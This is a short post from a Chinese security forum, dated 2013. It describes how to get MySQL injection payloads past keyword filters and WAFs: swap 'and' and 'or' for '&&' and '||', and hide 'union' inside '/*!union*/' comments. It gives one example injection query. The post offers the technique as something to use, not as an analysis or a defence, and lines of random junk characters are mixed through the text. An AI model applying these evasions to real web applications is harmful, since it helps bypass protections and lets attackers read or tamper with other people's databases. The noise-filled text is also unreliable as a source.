找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1766|回复: 0
打印 上一主题 下一主题

mysql注入对and or的过滤及uinon select等过滤的一个方法突破

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:41:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.and 用&& 代替
2 a0 T; _/ R8 J' }* a. H
+ o5 J3 M" f- c' R0 D2. or 用||代替
, T& z9 z% \7 h8 {. |7 C5 p1 w8 H( O, L8 f) O
3.union select from 变成 /*!union*/这种。
5 Y, g7 |+ R8 }$ m: g8 S7 p3 W' n8 U& X
一个例子:
0 j9 a9 p0 z- ]5 J6 @; `& F! [9 ^; [$ _7 A3 X; T6 a
/ select 1 /*!union*/ select 2 from adad where 1&&1
4 W: @; _0 y- Q6 R$ m: ?' m  s
2 j& z9 \$ M; ^# i' Z: ]摘自 it_security7 J) Y) i# i9 C; F+ W+ I$ c3 `

! a' d0 h/ x- K' t, S4 W1 \绕过waf的一个思路) X1 ~' h) B$ u5 R
" O! F" [3 k2 l5 r2 c: a8 N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表